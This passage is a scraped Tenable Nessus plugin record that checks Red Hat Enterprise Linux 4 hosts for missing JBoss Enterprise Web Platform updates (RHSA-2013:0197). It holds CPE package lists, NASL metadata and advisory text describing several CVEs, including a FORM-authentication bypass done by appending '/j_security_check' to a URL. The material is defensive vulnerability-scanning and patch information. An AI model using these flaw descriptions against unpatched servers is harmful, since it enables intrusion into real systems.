"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search", "p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc", "p-cpe:/a:redhat:enterprise_linux:jacorb-jboss", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:jboss-aop2", "p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-core", "p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-cl", "p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api", "p-cpe:/a:redhat:enterprise_linux:jboss-common-beans", "p-cpe:/a:redhat:enterprise_linux:jboss-common-core", "p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee", "p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms", "p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec", "p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers", "p-cpe:/a:redhat:enterprise_linux:jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:jboss-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-reflect", "p-cpe:/a:redhat:enterprise_linux:jboss-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples", "p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-security-spi", "p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api", "p-cpe:/a:redhat:enterprise_linux:jboss-vfs2", "p-cpe:/a:redhat:enterprise_linux:jbossas-web", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-client", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses", "p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native", "p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp", "p-cpe:/a:redhat:enterprise_linux:jbosssx2", "p-cpe:/a:redhat:enterprise_linux:jbossts", "p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api", "p-cpe:/a:redhat:enterprise_linux:jbossweb-lib", "p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api", "p-cpe:/a:redhat:enterprise_linux:jbossws", "p-cpe:/a:redhat:enterprise_linux:jbossws-common", "p-cpe:/a:redhat:enterprise_linux:jbossws-framework", "p-cpe:/a:redhat:enterprise_linux:jbossws-spi", "p-cpe:/a:redhat:enterprise_linux:jgroups", "p-cpe:/a:redhat:enterprise_linux:jopr-embedded", "p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin", "p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-native", "p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp", "p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:resteasy-examples", "p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc", "p-cpe:/a:redhat:enterprise_linux:resteasy-manual", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs", "p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples", "p-cpe:/a:redhat:enterprise_linux:rhq", "p-cpe:/a:redhat:enterprise_linux:rhq-common-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-domain", "p-cpe:/a:redhat:enterprise_linux:rhq-core-gui", "p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system", "p-cpe:/a:redhat:enterprise_linux:rhq-core-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api", "p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container", "p-cpe:/a:redhat:enterprise_linux:rhq-core-util", "p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common", "p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-parent", "p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin", "p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent", "p-cpe:/a:redhat:enterprise_linux:spring2", "p-cpe:/a:redhat:enterprise_linux:spring2-agent", "p-cpe:/a:redhat:enterprise_linux:spring2-all", "p-cpe:/a:redhat:enterprise_linux:spring2-aop", "p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", "p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2013-0197.NASL", "href": "https://www.tenable.com/plugins/nessus/78947", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0197. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78947);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0197\");\n\n script_name(english:\"RHEL 4 : JBoss EWP (RHSA-2013:0197)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple\nsecurity issues, various bugs, and add several enhancements are now\navailable for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Web Platform 5.1.2, and includes bug\nfixes and enhancements. As JBoss Enterprise Web Platform is a subset\nof JBoss Enterprise Application Platform, refer to the JBoss\nEnterprise Application Platform 5.2.0 Release Notes for information on\nthe most significant of these changes. The Release Notes will be\navailable shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator#authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0197\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n 